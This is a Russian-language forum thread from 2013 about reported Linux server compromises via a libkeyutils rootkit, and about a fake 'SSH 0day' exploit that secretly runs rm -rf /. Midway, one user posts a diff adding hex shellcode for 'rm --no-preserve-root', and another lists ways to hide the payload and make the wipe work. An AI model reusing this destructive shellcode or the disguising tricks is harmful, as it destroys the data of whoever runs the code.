130. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:09 
Что ж они кернель так сразу не прибили-то? ЧТоб проблем не было...
Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

131. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:10 
Вот что-то такое и бывает когда виндузятник из своего putty.exe админит линь или бзды. Там же и привкеи тырят.
Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

132. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:13 
> Вот что-то такое и бывает когда виндузятник из своего putty.exe админит линь
> или бзды. Там же и привкеи тырят.

iptables -I INPUT -p tcp -m osf --genre Windows --ttl 2 -j DROP

должно стать дефолтом для всех серверов с linux. :)

Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

197. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:24 
если добавить --dport 22 - вполне разумная мера, кстати.
Ответить | Правка | ^ к родителю #132 | Наверх | Cообщить модератору

147. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:27 
automagically ???
Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

143. "Эм-м"  +/
Сообщение от Непонявший on 19-Фев-13, 16:24 
"Среди атакованных систем также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту."
sshd на нестандартном порту? это на что намек?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

146. "Эм-м"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:26 
> sshd на нестандартном порту? это на что намек?

На то, что это не тупой переборщик sshd. Что это или вообще не ssh, или переборщик грамотный (умеет в настройках putty.exe порт прочитать).


Ответить | Правка | ^ к родителю #143 | Наверх | Cообщить модератору

187. "Эм-м"  +/
Сообщение от Непонявший on 19-Фев-13, 17:15 
Переборщики портов теперь проверяют наличие putty.exe на машине и тащат оттуда по глупости сохраненный пасс?

И все же причем тут нестандартный порт в новости?

Ответить | Правка | ^ к родителю #146 | Наверх | Cообщить модератору

188. "Эм-м"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:17 
> Переборщики портов теперь проверяют наличие putty.exe на машине и тащат оттуда по
> глупости сохраненный пасс?

Это способ 'взлома linux', проверенный временем. :)

Ответить | Правка | ^ к родителю #187 | Наверх | Cообщить модератору

190. "Эм-м"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:18 
> И все же причем тут нестандартный порт в новости?

Переборщик ломился бы только по стандартному, брезгуя теми избранными, кто порт поменял.

Ответить | Правка | ^ к родителю #187 | Наверх | Cообщить модератору

272. "Эм-м"  +/
Сообщение от Непонявший on 19-Фев-13, 18:32 
Блин, ну я таких тонкостей про переборщик (от слова перебирать) не знал(((
А по существу, где связь-то нестандартности порта и масс взлома?

Там еще овер 100500 пакетов стоит с правленными конфигами, их тоже в чем-то подозревать?

Ответить | Правка | ^ к родителю #190 | Наверх | Cообщить модератору

273. "Эм-м"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:34 
> Там еще овер 100500 пакетов стоит с правленными конфигами, их тоже в
> чем-то подозревать?

Тамбовский гейм тебе овер.

Ответить | Правка | ^ к родителю #272 | Наверх | Cообщить модератору

421. "Эм-м"  +/
Сообщение от Непонявший on 19-Фев-13, 23:29 
Спасибо за исчерпывающий ответ.
Ответить | Правка | ^ к родителю #273 | Наверх | Cообщить модератору

149. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Пиу on 19-Фев-13, 16:27 
а никто еще это файл не дизассемблировал и не сравнил с оригиналом (ну или чем-то, похожим на оригинал) ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

151. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:31 
Зачем? Мы автора петициями закидаем, пусть исходники открывает.
Ответить | Правка | ^ к родителю #149 | Наверх | Cообщить модератору

153. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от piteri (ok) on 19-Фев-13, 16:32 
Хм, что то я не могу найти ссылок кого именно взломали. Может взом не такой и массовый и кто-то просто натырил сертификатов/паролей от путти?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

154. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:35 
> Хм, что то я не могу найти ссылок кого именно взломали. Может
> взом не такой и массовый и кто-то просто натырил сертификатов/паролей от
> путти?

Ложечки найдутся, а строчка в "get the facts" останутся. Уже никто не будет помнить, что, кого, но сам факт запомнится. :)

Ответить | Правка | ^ к родителю #153 | Наверх | Cообщить модератору

174. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от piteri (ok) on 19-Фев-13, 17:03 
Какой факт?
Ответить | Правка | ^ к родителю #154 | Наверх | Cообщить модератору

177. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:06 
> Какой факт?

Которые 'большой бизнес' для своих 'get the facts' лепит из сплетен, слухов и подозрений, помноженных на отчаянную неправду. :)

Ответить | Правка | ^ к родителю #174 | Наверх | Cообщить модератору

285. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от piteri (ok) on 19-Фев-13, 18:55 
Вы про "MS get the facts" на который всем пофиг?
Ответить | Правка | ^ к родителю #177 | Наверх | Cообщить модератору

289. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 19:01 
> Вы про "MS get the facts" на который всем пофиг?

Я про слухи. "Это тот red hat, который недавно крупно поломали?". Хотя никого так и не поломали.

Вон, про debian  и openssl до сих пор несколько раз в неделю темы всплывают.


Кому пофиг? Тем, кому нужно принимать решения ещё до того, как они станут экспертами, и которые используют для этого решения все источники информации, включая массовые слухи? Нельзя стать экспертом в чём-либо, сначала не выбрав это что-то. И этот выбор должен быть обоснован. И тут любая мелочь играет роль.

Ответить | Правка | ^ к родителю #285 | Наверх | Cообщить модератору

546. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:08 
>> Вы про "MS get the facts" на который всем пофиг?
> Я про слухи. "Это тот red hat, который недавно крупно поломали?". Хотя
> никого так и не поломали.

если у тебя взлома не было - не значит что его нет совсем.


> Вон, про debian  и openssl до сих пор несколько раз в
> неделю темы всплывают.

А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?

Ответить | Правка | ^ к родителю #289 | Наверх | Cообщить модератору

596. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 01:51 
> если у тебя взлома не было - не значит что его нет совсем.

Логично. Однако нет вообще никаких сведений о том WTF, собственно. Что не мешает гражданину с характерным ником растопыривать пальцы веером.

> А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?

Оно конечно правда, однако было весьма давно. Кроме того, изменения были заапрувлены авторами openssl, так что к ним не меньше вопросов чем к самим дебианщикам. Вообще, людям свойственно ошибаться. И если не хочется наступать на ошибки в софте - есть только 1 способ это сделать: вернуться назад в пещеры и не пользоваться софтом вообще. Вот тогда будет хорошо.

Ответить | Правка | ^ к родителю #546 | Наверх | Cообщить модератору

684. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 21-Фев-13, 20:32 
>> если у тебя взлома не было - не значит что его нет совсем.
> Логично. Однако нет вообще никаких сведений о том WTF, собственно. Что не
> мешает гражданину с характерным ником растопыривать пальцы веером.

что там происходит - не знает никто. Хотя более чем 1 человек работают над тем что бы понять.
Хуже что многие начали избавляться от руткита - и в результате машины остались без следов.
А что вам мой ник?:) когда тут ходят с bsd rip и забивают этим форум - это не страшно, а тут вам мой ник помешал :-)

>> А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?
> Оно конечно правда, однако было весьма давно. Кроме того, изменения были заапрувлены
> авторами openssl, так что к ним не меньше вопросов чем к

насколько я помню - все было с точностью до наоборот. OpenSSL team толи икто не спросил, толи тихо влил себе изменения - после таймаута на ответ с их стороны.


> самим дебианщикам. Вообще, людям свойственно ошибаться. И если не хочется наступать
> на ошибки в софте - есть только 1 способ это сделать:
> вернуться назад в пещеры и не пользоваться софтом вообще. Вот тогда
> будет хорошо.

ЭЭ.. цена ошибки только разная. Что говорит о том что отвественности - не на грошь.
Как и компетентности тех кто это делает.

Ответить | Правка | ^ к родителю #596 | Наверх | Cообщить модератору

694. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от arisu (ok) on 22-Фев-13, 03:45 
> Кроме того, изменения были заапрувлены авторами openssl

это ложь. которую я уже настолько заколебался опровергать, что и линки потёр. сказано авторами было примерно такое: «да, если вам мешает отлаживаться — можете закомментарить, ничего страшного». любое вменяемое существо (ну, кроме маинтайнера бебиана, там проблемы со вменяемостью) это понимает как «ничего страшного, *для отладки сойдёт*». где тут карт-бланш на те же действия в релизном варианте — знает только «гав-гав-комьюнити» бебиана, которое облило грязью всех, кого смогло.

Ответить | Правка | ^ к родителю #596 | Наверх | Cообщить модератору

698. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 22-Фев-13, 10:39 
>> Кроме того, изменения были заапрувлены авторами openssl
> это ложь. которую я уже настолько заколебался опровергать, что и линки потёр.
> сказано авторами было примерно такое: «да, если вам мешает отлаживаться —
> можете закомментарить, ничего страшного». любое вменяемое существо (ну, кроме маинтайнера
> бебиана, там проблемы со вменяемостью) это понимает как «ничего страшного, *для
> отладки сойдёт*». где тут карт-бланш на те же действия в релизном
> варианте — знает только «гав-гав-комьюнити» бебиана, которое облило
> грязью всех, кого смогло.

ооо.. я в кой веки соглашусь с artsu.

Ответить | Правка | ^ к родителю #694 | Наверх | Cообщить модератору

156. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от evgeny_t (??) on 19-Фев-13, 16:36 
а это нормально ?
-rw-r--r-- 1 root root 10224 2009-11-05 11:48 libkeyutils-1.2.so
lrwxrwxrwx 1 root root    18 2010-11-08 13:32 libkeyutils.so.1 -> libkeyutils-1.2.so
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

159. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:38 
> а это нормально ?
> -rw-r--r-- 1 root root 10224 2009-11-05 11:48 libkeyutils-1.2.so
> lrwxrwxrwx 1 root root    18 2010-11-08 13:32 libkeyutils.so.1 ->
> libkeyutils-1.2.so

Нормально.

Ответить | Правка | ^ к родителю #156 | Наверх | Cообщить модератору

160. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:39 
Джо так и не поймали.

Больше похоже, что "в сети зафиксирован массовый психоз на почве взлома серверов на linux".

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

166. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Анонимовец on 19-Фев-13, 16:52 
http://pastebin.com/WgXrebLq

А вот в чем дело! о_О

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

170. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:56 
> http://pastebin.com/WgXrebLq
> А вот в чем дело! о_О

забавно

http://www.opennet.dev/openforum/vsluhforumID3/88607.html#7

http://www.opennet.dev/openforum/vsluhforumID3/88607.html#37

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

175. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:04 
а точно он?

SSH 5.3 remote root 0day exploit
By: favoriter6 on Jan 18th, 2013

Сегодня февраль. Не 21-е, как по теме выше, но тоже близко.

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

191. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Xasd (ok) on 19-Фев-13, 17:19 
> http://pastebin.com/WgXrebLq
> А вот в чем дело! о_О

странный скрипт.

просит указать <target> и <port> в качестве переменных ``argv``...

но при этом так и НЕ использует эти ``argv`` :-)

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

196. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:23 
>> http://pastebin.com/WgXrebLq
>> А вот в чем дело! о_О
> странный скрипт.
> просит указать <target> и <port> в качестве переменных ``argv``...
> но при этом так и НЕ использует эти ``argv`` :-)

Ага. "Новость о взломе - поломано 50 компьютеров".

"Эксплоит, тестирующий по поводу новости о взломе - поломано 50000 компьютеров".


А что он делает, на глаз можете определить?

Ответить | Правка | ^ к родителю #191 | Наверх | Cообщить модератору

202. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:29 
Вообще-то нормальная практика - оторвать кусок, чтобы совсем уж скрипткиддисы не гоняли
Ответить | Правка | ^ к родителю #191 | Наверх | Cообщить модератору

204. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:32 
не, там какая-то невнятная муть, судя по всему.
вот это вот - (*(void(*)())decoder)(); - как-то совсем не радует
Ответить | Правка | ^ к родителю #202 | Наверх | Cообщить модератору

207. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:34 
> не, там какая-то невнятная муть, судя по всему.
> вот это вот - (*(void(*)())decoder)(); - как-то совсем не радует

Да вообще не стоит сомнительную муть из интернета самому компилировать и запускать. Здесь вам не тут!

Ответить | Правка | ^ к родителю #204 | Наверх | Cообщить модератору

211. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:38 
Ну, на то и виртуалки. И, кстати, результат забавный:

[alex@host ~]$ sudo ./a.out 10.0.0.1 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
/bin//rm: it is dangerous to operate recursively on `/'
/bin//rm: use --no-preserve-root to override this failsafe
[alex@buzzalex ~]$

Ответить | Правка | ^ к родителю #207 | Наверх | Cообщить модератору

399. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 22:15 
> Ну, на то и виртуалки. И, кстати, результат забавный:
> [alex@host ~]$ sudo ./a.out 10.0.0.1 22
> MIKU! MIKU! MIKU!
> [-] Exploit failed.
> /bin//rm: it is dangerous to operate recursively on `/'
> /bin//rm: use --no-preserve-root to override this failsafe
> [alex@buzzalex ~]$

//fixed


--- coolxploit.c        2013-02-19 20:00:56.084967001 +0200
+++ coolxploit_fix.c    2013-02-19 20:13:16.276967001 +0200
@@ -29,15 +29,11 @@
     exit(1);
}

-unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
-                           "\x6a\x2f\x89\xe7\x52"
-                           "\x66\x68\x2d\x66\x89"
-                           "\xe6\x52\x66\x68\x2d"
-                           "\x72\x89\xe1\x52\x68"
-                           "\x2f\x2f\x72\x6d\x68"
-                           "\x2f\x62\x69\x6e\x89"
-                           "\xe3\x52\x57\x56\x51"
-                           "\x53\x89\xe1\xcd\x80";
+unsigned char decoder[]=   "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08"
+                           "\x89\x5e\x1f\x89\x46\x23\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x23\xcd"
+                           "\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f\x72\x6d\x4f\x2d\x2d\x6e"
+                           "\x6f\x2d\x70\x72\x65\x73\x65\x72\x76\x65\x2d\x72\x6f\x6f\x74\x4f\x54"
+                           "\x4f\x52\x41\x54\x4f\x52\x41\x54\x4f\x52\x41";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                            "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"

Ответить | Правка | ^ к родителю #211 | Наверх | Cообщить модератору

410. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 22:45 
Добавил ключик, что ли? :-)
Ответить | Правка | ^ к родителю #399 | Наверх | Cообщить модератору

418. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 23:10 
> Добавил ключик, что ли? :-)

ага. щас проверил, оно, правда, нифига не работает, но мне уже лень разбираться, где я с офсетами напортачил.

фатя, и так полчаса убил, сочиняя на авке эскейпирование опкодов из дампа.

Ответить | Правка | ^ к родителю #410 | Наверх | Cообщить модератору

597. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 01:53 
Дожили, скрипткидисы даже ремувалку файлов засунуть в payload уже нормально не могут.
Ответить | Правка | ^ к родителю #418 | Наверх | Cообщить модератору

356. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:09 
> странный скрипт.

Анализ странного скрипта, или немного гуглинга по правильным кейвордам: http://www.tamonten.com/how-not-to-exploit-a-box

Категорически не советую запускать: судя по всему там попросту замаскированный под пенек rm -rf / aka попытка в 100500-й раз натянуть скрипткидизов возомнивших себя крутыми.

Ответить | Правка | ^ к родителю #191 | Наверх | Cообщить модератору

427. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok) on 20-Фев-13, 00:48 
да, забавная действительно штука :) , с научной точки зрения..
Ответить | Правка | ^ к родителю #356 | Наверх | Cообщить модератору

598. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 01:57 
> да, забавная действительно штука :) , с научной точки зрения..

Правда писали это такие же долбодятлы как те на которых он ориентирован. Ну то-есть, payload там кривой и не работает нифига. Что за люди, даже систему раздестроить нормально не могут :).

А вообще на месте этих кидей я бы лучше в payload'е открывал шелл к ... локалхосту :). А дальше пусть кидис сам себя и хакает наздоровье. Готов поспорить, немало киддей удивилось бы результату хака. Так что если кто хочет натянуть очередную порцию кидисов - дарю идею! :)

Ответить | Правка | ^ к родителю #427 | Наверх | Cообщить модератору

617. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok) on 21-Фев-13, 09:24 
> А дальше пусть кидис сам себя и хакает наздоровье.

первую команду которую он введёт -- наверняка  как раз и будет ---- rm -vRf /*

:-D

действительно -- этот план на много лучше :)

Ответить | Правка | ^ к родителю #598 | Наверх | Cообщить модератору

220. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Иван Иванович Иванов on 19-Фев-13, 17:45 
"exploit" такой "exploit"

Для малолетних идиотов would-be-script-kiddies: этот c'ник ничего не ломает, а вот на вашей системе он выполняет

rm -rf /

// b.

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

226. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:48 
> "exploit" такой "exploit"
> Для малолетних идиотов would-be-script-kiddies: этот c'ник ничего не ломает, а вот на
> вашей системе он выполняет
> rm -rf /
> // b.

Мы потихоньку догадалсь.


В linux пришли привычки, которые смогут поломать даже самую крепкую защиту. Смотришь на местных виндузятников, и думаешь "а вдруг им такие же доверят что-то для меня важное, что же делать тогда?".

Скоро придётся строить свой интернет.

Ответить | Правка | ^ к родителю #220 | Наверх | Cообщить модератору

235. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:56 
вообще-то он это делает только если не добавить убитую строку, копирующую имя хоста в переменную host.
Ответить | Правка | ^ к родителю #220 | Наверх | Cообщить модератору

250. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 18:05 
А вот детальный разбор этой штуки: http://www.tamonten.com/how-not-to-exploit-a-box
Ответить | Правка | ^ к родителю #220 | Наверх | Cообщить модератору

335. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от PnD (??) on 19-Фев-13, 20:03 
  И чо? Нашел жертву с "OpenSSH_5.1p1 Debian-5, OpenSSL 0.9.8g 19 Oct 2007", скомпилял эту хрень (заметим, там в коде кондовые баги типа отсутствия разбора argv[], это даже я ни-разу-не-программист вижу). Натравил (поправив в меру разумения), волшебный сокет не открывается.
  Вас обманули! (с) ;)
Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

340. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от PnD (??) on 19-Фев-13, 20:11 
  Ммм... Оказывается, исправив кривизну, проскочил самое вкусное ;)
Однако, "rm -Rf /" давно несовременно, теперь пишут "rm -Rf /*" для нужного результата (в sysutils тупо затычка)
Ответить | Правка | ^ к родителю #335 | Наверх | Cообщить модератору

358. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:11 
> нужного результата (в sysutils тупо затычка)

Ну, нерабочий kiddie pwner у кого-то получился. Тот кто его писал тоже был ж@поруким, что поделать :)

Ответить | Правка | ^ к родителю #340 | Наверх | Cообщить модератору

618. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok) on 21-Фев-13, 09:30 
>> нужного результата (в sysutils тупо затычка)
> Ну, нерабочий kiddie pwner у кого-то получился. Тот кто его писал тоже
> был ж@поруким, что поделать :)

жалко конешно что исправленную версию -- так ни кто и не закачал обратно на  http://pastebin.com :-)

под словом "исправленную" -- я конешно же имею ввиду:

* чтобы ``rm -Rf /*'' отрабатывалось как надо

* чтобы не палевно:

    ** разбор ``argv''

    ** разделение-на-составные-части и сокрытие-частей-внутри-сторонних-функций ``(*(void(*)())decoder)()''

* чтобы x86_64/x86_32 нормально работало (наверно придётся для этого готовить две разные константы блоба)

Ответить | Правка | ^ к родителю #358 | Наверх | Cообщить модератору

375. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Пиу on 19-Фев-13, 21:29 
(*(void(*)())decoder)();

аккуратнее нужно было прятать, а так мне нравится ваш decoder со строчкой на пёрле

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

376. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Пиу on 19-Фев-13, 21:31 
> (*(void(*)())decoder)();
> аккуратнее нужно было прятать, а так мне нравится ваш decoder со строчкой
> на пёрле

ох я и медленный оказывается...

Ответить | Правка | ^ к родителю #375 | Наверх | Cообщить модератору

171. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Клим on 19-Фев-13, 17:01 
snort-ом не пользуются чтоль?
не волнуйтесь, Кашперский уже спешит на помошь!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

184. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 17:12 
> snort-ом не пользуются чтоль?
> не волнуйтесь, Кашперский уже спешит на помошь!

Ты Snort хоть раз настроить и хотя бы месяц посопровождать НЕ НА ЛОКАЛХОСТЕ пробовал?

Ответить | Правка | ^ к родителю #171 | Наверх | Cообщить модератору

270. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от Клим on 19-Фев-13, 18:28 
конечно нет,
но я видел фотку обложки книжки по snort-у
Ответить | Правка | ^ к родителю #184 | Наверх | Cообщить модератору

195. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от ALex_hha (ok) on 19-Фев-13, 17:22 
проверил на виртуалке

# ./ssh_expl 192.168.207.51 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
Segmentation fault

на 192.168.207.51

# uname -a
Linux test.example.net 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:42:30 EST 2012 i686 i686 i386 GNU/Linux

# ssh -v
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008

ЧЯДНТ?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

198. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:24 
> ЧЯДНТ?

библиотека key.1.9 появилась? :)


Ответить | Правка | ^ к родителю #195 | Наверх | Cообщить модератору

205. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от IMHO on 19-Фев-13, 17:32 
а зачем, exploit failed это отвлекающий маневр, но всем по фиг
Ответить | Правка | ^ к родителю #198 | Наверх | Cообщить модератору

337. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Dimez (??) on 19-Фев-13, 20:07 
> а зачем, exploit failed это отвлекающий маневр, но всем по фиг

Он реально failed, я запустил в виртуалке
1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]

Ответить | Правка | ^ к родителю #205 | Наверх | Cообщить модератору

412. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Михрютка (ok) on 19-Фев-13, 22:50 
>> а зачем, exploit failed это отвлекающий маневр, но всем по фиг
> Он реально failed, я запустил в виртуалке
> 1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]

под рутом надо было ггг

Ответить | Правка | ^ к родителю #337 | Наверх | Cообщить модератору

432. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Dimez (??) on 20-Фев-13, 01:57 
>>> а зачем, exploit failed это отвлекающий маневр, но всем по фиг
>> Он реально failed, я запустил в виртуалке
>> 1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]
> под рутом надо было ггг

А я под рутом и запустил, что мне, жалко контейнер что ли? :)

Ответить | Правка | ^ к родителю #412 | Наверх | Cообщить модератору

599. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 02:00 
> под рутом надо было ггг

Да он даже под рутом failed - кидисы payload написали горбато, увы.

Ответить | Правка | ^ к родителю #412 | Наверх | Cообщить модератору

265. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от pavlinux (ok) on 19-Фев-13, 18:18 

$ ls -la /lib/libkeyutils.so.1*
lrwxrwxrwx 1 root root   18 Май 28  2012 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
-rw-r--r-- 1 root root 8528 Апр  4  2010 /lib/libkeyutils.so.1.3

# dpkg --search  /lib/libkeyutils.so.1.3
libkeyutils1: /lib/libkeyutils.so.1.3

$ uname -a
Linux mail 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux

$ cat /etc/debian_version
6.0.6

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

469. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 11:11 
У меня точно также и что это значит? Всё штатно?
Ответить | Правка | ^ к родителю #265 | Наверх | Cообщить модератору

283. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от anonymousY (ok) on 19-Фев-13, 18:51 

Судя по http://stackoverflow.com/questions/14164552/keyctl-commands-... руткит в сети сильно дольше чем три дня.
А смотря на "репорты" хакнутых, и попытки решить проблему без переустановки зарученого хоста, ломают полных нубов.
Подозреваю что "хакнуты" они были самыми разными способами, едва ли это проблемы дистрибутива.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

328. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:46 
Уважаемые гуру.А кто ВИДЕЛ в сети сообщения,что попали под это Debian  || Ubuntu?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

336. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от ALex_hha (ok) on 19-Фев-13, 20:03 
> библиотека key.1.9 появилась? :)

на 192.168.207.51 ничего не появилось

# cd /lib/
# ls -la libkeyutils*
-rwxr-xr-x 1 root root 7880 Jan  6  2007 libkeyutils-1.2.so
lrwxrwxrwx 1 root root   18 Apr 15  2011 libkeyutils.so.1 -> libkeyutils-1.2.so

# rpm -qf libkeyutils-1.2.so
keyutils-libs-1.2-1.el5

# rpm -qf libkeyutils.so.1
keyutils-libs-1.2-1.el5

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

342. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 20:15 
Малоизвестная компания http://solidshellsecurity.com/ поставляет коммерческие решения якобы защиты для Windows (!!), а также услуги хостинга. Публикует сущую дичь о высосаннных из пальца проблемах (которых нет на самом деле), чем вызывает многостраничные обсуждения подготовленных и умных людей.

Удивляюсь вам, господа.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

355. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
